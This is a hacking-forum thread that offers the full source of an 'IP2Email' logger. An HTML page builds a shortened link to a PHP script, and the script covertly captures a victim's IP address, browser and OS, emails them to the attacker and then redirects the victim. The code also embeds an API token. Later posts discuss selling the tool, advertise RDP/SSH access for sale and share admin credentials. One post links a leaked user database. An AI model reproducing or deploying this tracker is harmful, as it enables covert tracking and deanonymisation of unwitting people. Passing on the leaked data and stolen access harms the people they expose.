ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Home
Upgrade
Credits
Help
Search
Awards
Achievements
 6947

[IP LOGGER] IP2Email Source + Tutorial - Discover a user ip address remotely

by datagroove - 10-03-2017 - 05:09 PM
#11
Re-Uploaded:
http://www.mediafire.com/file/jj939bb6bs...SOURCE.zip


IP2Email Link Generator.html
Code:
<html>
<title>IP2Email Link Generator</title>
<body bgColor=#5e717f><br>
<table style="background: #bed5e2;" cellspacing=0 cellpadding=0 align=center>
 <tr>
   <td style="border-right: #d8d8d8 0.75pt solid; padding-right: 6pt; border-top: #d8d8d8 0.75pt solid; padding-left: 6pt; background: #567280; padding-bottom: 6pt; border-left: #d8d8d8 0.75pt solid; width: 317.5pt; padding-top: 6pt;">
     <p><b><span style="font-size: 10pt; color: #ff9900; font-family: verdana; mso-ansi-language: en">IP2Email Link Generator</span></b></p>
   </td>
  </tr>
  <tr>
   <td style="padding-right: 6pt; padding-left: 6pt; padding-bottom: 6pt; padding-top: 6pt"><br>
    <center><table border=0 cellspacing=0 cellpadding=0><tr><td>
   <p style="margin:0cm;margin-bottom:.0001pt;line-height:115%">
   <span style="font-size:9.0pt;font-family:verdana;">Generate a link that sends the target IP to your email!</p>
   </td></tr></table>
<script>
function doSearch( selectedIndex, searchTerm, searchTerm2 ) {
if (searchTerm == "") {
     alert("Write your email!");
     return false;
  }
if (searchTerm2 == "") {
     alert("Write the destination url!");
     return false;
  }
  window.open(SEARCH_DATA[selectedIndex][1],SEARCH_DATA[selectedIndex][0]);
}
function engine1(selectedIndex,searchTerm,searchTerm2)
{
  SEARCH_DATA= new Array(0);
  SEARCH_DATA[1]= new Array("a1","https://api-ssl.bitly.com/v3/shorten?access_token=d75aa27df880878ed0be09df34bebc9e557597ec&longUrl=http://privateloader.atspace.cc/1.php?email="+escape(searchTerm)+"%26url="+escape(searchTerm2)+"&format=txt");
doSearch( selectedIndex, searchTerm, searchTerm2 );
  return true;
}
</script>
</p>
<table>
<form name="Form1" onsubmit="javascript:engine1(this.engine.value,this.var1.value,this.var2.value); return false;">
<input type="hidden" name="engine" value=1>
<tr><td>Your Email:</td><td><input type="text" class="text" size="20" name="var1" placeholder="Ex: [email protected]"></td></tr>
<tr><td>Destination URL:</td><td><input type="text" class="text" size="20" name="var2" placeholder="Ex: http://www.example.com"></td></tr>
<tr><td></td><td><input type="submit" value="Generate Link!" class="submit" name="submit"></td></tr>
</form>
</table>
<iframe name="a1" frameborder="0" width="317.5pt" height="30" scrolling="no"></iframe>
</p>
<table style="background: #bed5e2; width: 317.5pt; border-collapse: collapse; mso-padding-alt: 6.0pt 6.0pt 6.0pt 6.0pt" cellspacing=0 cellpadding=0 width=690 align=center bgColor=#bed5e2 border=0>
 <tr><td style="border-right: #d8d8d8 0.75pt solid; padding-right: 6pt; border-top: #d8d8d8 0.75pt solid; padding-left: 6pt; background: #567280; padding-bottom: 6pt; border-left: #d8d8d8 0.75pt solid; width: 450pt; padding-top: 6pt; border-bottom: medium none">
     <center><p><b><span style="font-size: 10pt; color: #c2dceb; font-family: verdana; mso-ansi-language: EN">Copyright © 2017 Privateloader</span></center></b>
     </td></tr></table>

1.php
Code:
<?PHP
function getUserIP()
{
   $client  = @$_SERVER['HTTP_CLIENT_IP'];
   $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
   $remote  = $_SERVER['REMOTE_ADDR'];

   if(filter_var($client, FILTER_VALIDATE_IP))
   {
       $ip = $client;
   }
   elseif(filter_var($forward, FILTER_VALIDATE_IP))
   {
       $ip = $forward;
   }
   else
   {
       $ip = $remote;
   }

   return $ip;
}

$user_ip = getUserIP();

$user_agent     =   $_SERVER['HTTP_USER_AGENT'];

function getOS() {

   global $user_agent;

   $os_platform    =   "Unknown OS Platform";

   $os_array       =   array(
                           '/windows nt 10/i'     =>  'Windows 10',
                           '/windows nt 6.3/i'     =>  'Windows 8.1',
                           '/windows nt 6.2/i'     =>  'Windows 8',
                           '/windows nt 6.1/i'     =>  'Windows 7',
                           '/windows nt 6.0/i'     =>  'Windows Vista',
                           '/windows nt 5.2/i'     =>  'Windows Server 2003/XP x64',
                           '/windows nt 5.1/i'     =>  'Windows XP',
                           '/windows xp/i'         =>  'Windows XP',
                           '/windows nt 5.0/i'     =>  'Windows 2000',
                           '/windows me/i'         =>  'Windows ME',
                           '/win98/i'              =>  'Windows 98',
                           '/win95/i'              =>  'Windows 95',
                           '/win16/i'              =>  'Windows 3.11',
                           '/macintosh|mac os x/i' =>  'Mac OS X',
                           '/mac_powerpc/i'        =>  'Mac OS 9',
                           '/linux/i'              =>  'Linux',
                           '/ubuntu/i'             =>  'Ubuntu',
                           '/iphone/i'             =>  'iPhone',
                           '/ipod/i'               =>  'iPod',
                           '/ipad/i'               =>  'iPad',
                           '/android/i'            =>  'Android',
                           '/blackberry/i'         =>  'BlackBerry',
                           '/webos/i'              =>  'Mobile'
                       );

   foreach ($os_array as $regex => $value) {

       if (preg_match($regex, $user_agent)) {
           $os_platform    =   $value;
       }

   }  

   return $os_platform;

}

function getBrowser() {

   global $user_agent;

   $browser        =   "Unknown Browser";

   $browser_array  =   array(
                           '/msie/i'       =>  'Internet Explorer',
                           '/firefox/i'    =>  'Firefox',
                           '/safari/i'     =>  'Safari',
                           '/chrome/i'     =>  'Chrome',
                           '/edge/i'       =>  'Edge',
                           '/opera/i'      =>  'Opera',
                           '/netscape/i'   =>  'Netscape',
                           '/maxthon/i'    =>  'Maxthon',
                           '/konqueror/i'  =>  'Konqueror',
                           '/mobile/i'     =>  'Handheld Browser'
                       );

   foreach ($browser_array as $regex => $value) {

       if (preg_match($regex, $user_agent)) {
           $browser    =   $value;
       }

   }

   return $browser;

}


$user_os        =   getOS();
$user_browser   =   getBrowser();

$email = $_GET["email"];
$url = $_GET["url"];
$headers = "From: [email protected]" . "\r\n";
mail("$email","The target IP","The target IP is: $user_ip \n\nBrowser: $user_browser \n\nOS: $user_os\n\n For more Privateloader tools just reply back to [email protected]!","$headers");
header("Location: $url");
die();
?>
BestChange - Exchange money at the best rates - https://www.bestchange.com/?p=936130
Pure VPN - Protect your data with the best vpn - https://rebrand.ly/Pure_VPN
Contact me by Email - https://bit.ly/Contact_Hacxx_Gmail
The House Of Credit Card - Findsome.ru
Reply
#12
postimage.info/private
user : admin
pass : IPLOGGER_123
Selling : RDPs | VNC | SSH Servers | Linux VPS | Nologins | Rockon
Reply
#13
@lokewmsnw - I did try your script but it needs to be more simplyfied. I got lost on what to do next. I just figure it out after viewing the source code and the fields.

Recomendations: Create a div or a table and center them, before the input type="text" add a name of what is necessary to the user to do. Remove the script that blocks the context menu because not anyone can "Ctrl + C" to grab the link. And last add a error handler when the fields are empty to show a warning message on how to procede from there.

Also the ip wasn't logged after viewing the link (May be something broken there)

Basically you have a good idea just follow this simple steps to fix it.
BestChange - Exchange money at the best rates - https://www.bestchange.com/?p=936130
Pure VPN - Protect your data with the best vpn - https://rebrand.ly/Pure_VPN
Contact me by Email - https://bit.ly/Contact_Hacxx_Gmail
The House Of Credit Card - Findsome.ru
Reply
#14
(06-14-2018 - 11:11 PM)datagroove Wrote: @lokewmsnw - I did try your script but it needs to be more simplyfied. I got lost on what to do next. I just figure it out after viewing the source code and the fields.

Recomendations: Create a div or a table and center them, before the input type="text" add a name of what is necessary to the user to do. Remove the script that blocks the context menu because not anyone can "Ctrl + C" to grab the link. And last add a error handler when the fields are empty to show a warning message on how to procede from there.

Also the ip wasn't logged after viewing the link (May be something broken there)

Basically you have a good idea just follow this simple steps to fix it.

Is working fine for me and more users, ip is logged.
Is only for test, i will make other with more domains, database, etc, but  for moment i dont want to add money on this ''project'' 
tis script i created on 15 minutes for my friend to grab ips and im using a free hosting, but if i see users are interesed for it and can help me with donation 1$-2$ to buy good hosting and more domains  i make time and i will create other iplogger script with db and more methods

sorry for my english
Selling : RDPs | VNC | SSH Servers | Linux VPS | Nologins | Rockon
Reply
#15
(06-15-2018 - 12:00 AM)lokewmsnw Wrote:
(06-14-2018 - 11:11 PM)datagroove Wrote: @lokewmsnw - I did try your script but it needs to be more simplyfied. I got lost on what to do next. I just figure it out after viewing the source code and the fields.

Recomendations: Create a div or a table and center them, before the input type="text" add a name of what is necessary to the user to do. Remove the script that blocks the context menu because not anyone can "Ctrl + C" to grab the link. And last add a error handler when the fields are empty to show a warning message on how to procede from there.

Also the ip wasn't logged after viewing the link (May be something broken there)

Basically you have a good idea just follow this simple steps to fix it.

Is working fine for me and more users, ip is logged.
Is only for test, i will make other with more domains, database, etc, but  for moment i dont want to add money on this ''project'' 
tis script i created on 15 minutes for my friend to grab ips and im using a free hosting, but if i see users are interesed for it and can help me with donation 1$-2$ to buy good hosting and more domains  i make time and i will create other iplogger script with db and more methods

sorry for my english

Sorry dude i coded in less time and it was of a hardware failure. Don't waste your time in "advertising". Make a better product and sell higher. For example use all your skills as a programmer and cut the code has hell. (HACK) and try to sell like $60 - $100 or more depending what it can really do.

$2 - That's to low

Here is a freebie
[Image: bXPJ6vL.jpg]

Info removed:
Seems like no one wants $10 to spend on amazon...

Methods of payment:
[Image: Q4niH5H.jpg]
BestChange - Exchange money at the best rates - https://www.bestchange.com/?p=936130
Pure VPN - Protect your data with the best vpn - https://rebrand.ly/Pure_VPN
Contact me by Email - https://bit.ly/Contact_Hacxx_Gmail
The House Of Credit Card - Findsome.ru
Reply
#16
For those of you that want to spend your time digging

Clixsense Leaked database 08-2016.
http://mega.nz/#!Xw10laKb!4cI3-PW6XPCsiq...73_lSvr_E4

The account above is clean, the surveys were taken only by spending a bit of my time giving away the correct answer to some companies.

Register your account:
https://csl.ink/2q6e
BestChange - Exchange money at the best rates - https://www.bestchange.com/?p=936130
Pure VPN - Protect your data with the best vpn - https://rebrand.ly/Pure_VPN
Contact me by Email - https://bit.ly/Contact_Hacxx_Gmail
The House Of Credit Card - Findsome.ru
Reply
#17
Code-HEIN:

https://www.gaboo.ga/2018/06/code-hein-2018-06-17.html
Reply

Users browsing: 1 Guest(s)